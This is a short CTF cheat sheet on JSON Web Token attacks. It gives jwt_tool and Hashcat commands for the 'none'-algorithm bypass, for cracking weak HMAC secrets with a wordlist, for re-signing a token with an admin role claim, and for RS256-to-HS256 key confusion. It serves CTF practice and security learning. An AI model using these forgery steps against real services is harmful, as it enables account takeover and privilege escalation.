JSON Web Tokens (JWT)
JSON Web Tokens (JWT) are compact, self‑contained authentication tokens used by web applications. A typical token contains three Base64‑encoded parts:
header.payload.signature
In CTFs, JWTs are frequently used for authentication puzzles where misconfiguration or weak signing keys allow you to forge or modify claims to become another user — often to escalate privileges or reveal a flag.
| Task | Command |
|---|---|
| Decode token manually | https://jwt.io |
| Analyze & exploit token | jwt_tool <token> |
| Test “none” algorithm | jwt_tool -X a <token> |
| Crack HMAC secret | jwt_tool --crack -d <wordlist> <token> |
| Tool | Purpose |
|---|---|
| jwt_tool | Comprehensive JWT analysis/exploitation utility |
| jwt.io | Web interface for decoding & verifying tokens |
| Hashcat | Brute‑force weak HMAC secrets (mode 16500: JWT) |
| jwt‑cracker | C‑based dictionary cracker for HMAC tokens |
| CyberChef | Convenient for Base64decode + inspection |
| Part | Description |
|---|---|
| Header | Algorithm & token type (e.g. {"alg":"HS256","typ":"JWT"}) |
| Payload | User data & claims ({"user":"guest","role":"user"}) |
| Signature | Verifies integrity (HMAC / RSA) |
Example token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoic3R1ZGVudCIsInJvbGUiOiJ1c2VyIn0.gTZhw7xI25pUySAGfbt4h6blRC3UV1RS3u9bxTxg6z0
If the server accepts alg":"none" without verifying a signature:
jwt_tool -X a <token>
This strips the signature and adjusts the header.
If the algorithm is HS256 (shared secret) and the key is weak, try cracking:
jwt_tool --crack -d rockyou.txt <token>
Or use Hashcat:
hashcat -m 16500 token.txt rockyou.txt
Once the key is discovered, sign a new token with elevated claims:
jwt_tool -S -p <secret> -I -pc "role" -pv "admin" <token>
If the server uses Asymmetric RSA but incorrectly trusts tokens signed via Symmetric HS256, replace the algorithm value and use the server’s public key as the secret to craft a valid HMAC.